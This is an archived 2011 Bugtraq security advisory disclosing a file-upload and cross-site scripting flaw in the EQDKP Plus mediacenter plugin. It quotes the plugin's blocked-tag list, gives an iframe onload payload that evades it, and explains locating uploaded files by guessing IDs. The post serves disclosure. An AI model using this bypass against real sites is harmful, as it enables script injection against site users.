Home page logo
/

bugtraq logo Bugtraq mailing list archives

EQDKP plus Cross Site Scripting and Bypass file extension
From: "iPower N/A" <vb.win32 () gmail com>
Date: Fri, 17 Jun 2011 06:59:49 +0400

Hello!

I have found a vulnerability in the EQDKP Plus.
More precisely in the plugin mediacenter.

Because of incorrectly checks the file extension
it is possible to upload the "htm" file and execute
XSS attack.

But with some restrictions. The plugin checks the contents for tags:

[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){
                
$disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
$disallowed_content = explode('|', $disallowed);
if (empty($disallowed_content))
        {
                return false;
}
[/code]

To get around this, you can use the Next design:
[code]
<iframe src="http://yandex.ru"; style="display: none" onload="alert('XSS')">
</iframe>
[/code]

After downloading the file to the server, you can find the file on request:
http://site.com/dkp/plugins/mediacenter/index.php?mode=ajax&id = [ID].
[ID] - simple exhaustive search.

Example:
http://www.eqdkp-plus.com/demo06/data/d2c0752ce264405a0555a3825c2494f2/mediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm

Vulnerable versions: <=0.6.4.5

P.S.
 Sorry for my bad english. :)

 Best Regards,
 iPower.


  By Date           By Thread  

Current thread:
  • EQDKP plus Cross Site Scripting and Bypass file extension iPower N/A (Jun 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault